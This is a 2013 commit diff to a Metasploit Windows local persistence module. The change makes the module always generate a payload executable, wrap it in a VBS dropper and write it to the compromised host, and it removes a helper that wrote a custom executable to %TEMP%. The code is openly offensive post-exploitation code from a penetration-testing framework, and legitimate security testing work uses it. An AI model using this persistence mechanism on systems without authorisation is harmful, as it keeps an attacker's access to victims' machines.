using always a vbs file to drop exe

jvazquez-r7 · jvazquez-r7 · commit 97edbb786898 · 2013-02-12T00:58:26.000+01:00
diff --git a/modules/exploits/windows/local/persistence.rb b/modules/exploits/windows/local/persistence.rb
@@ -59,28 +59,19 @@ def initialize(info={})
 	def exploit
 		print_status("Running module against #{sysinfo['Computer']}")
 
-		rexe = datastore['EXE::Custom']
 		rexename = datastore['REXENAME']
 		delay = datastore['DELAY']
 		reg_val = datastore['REG_NAME']
-		template_pe = datastore['EXE::Template']
 		@clean_up_rc = ""
 		host,port = session.session_host, session.session_port
 
-		if rexe.nil?
-			script = create_script(delay, template_pe)
-			script_on_target = write_script_to_target(script,rexename)
-			if script_on_target == nil
-				# exit the module because we failed to write the file on the target host.
-				return
-			end
-		else
-			alt_pay_exe = get_custom_exe
-			script_on_target = write_exe_to_target(alt_pay_exe, rexename)
-			if script_on_target == nil
-				# exit the module because we failed to write the file on the target host.
-				return
-			end
+		exe = generate_payload_exe
+		script = ::Msf::Util::EXE.to_exe_vbs(exe, {:persist => true, :delay => delay})
+		script_on_target = write_script_to_target(script,rexename)
+
+		if script_on_target == nil
+			# exit the module because we failed to write the file on the target host.
+			return
 		end
 
 		# Initial execution of script
@@ -228,27 +219,4 @@ def write_to_reg(key,script_on_target, registry_value)
 		end
 	end
 
-	# Writesexecutable to target host
-	#-------------------------------------------------------------------------------
-	def write_exe_to_target(exe_raw, rexename)
-		if rexename.nil?
-			exe_name = Rex::Text.rand_text_alpha(rand(8)+8)
-		else
-			exe_name = rexename
-		end
-
-		tempdir = session.fs.file.expand_path("%TEMP%")
-		tempexe = tempdir + "\\" + exe_name + ".exe"
-		begin
-			fd = session.fs.file.new(tempexe, "wb")
-			fd.write(exe_raw)
-			fd.close
-			print_good("Persistent executable written to #{tempexe}")
-			@clean_up_rc << "rm #{tempexe}\n"
-		rescue
-			print_error("Failed to write the payload on the target.")
-			tempexe = nil
-		end
-		return tempexe
-	end
 end
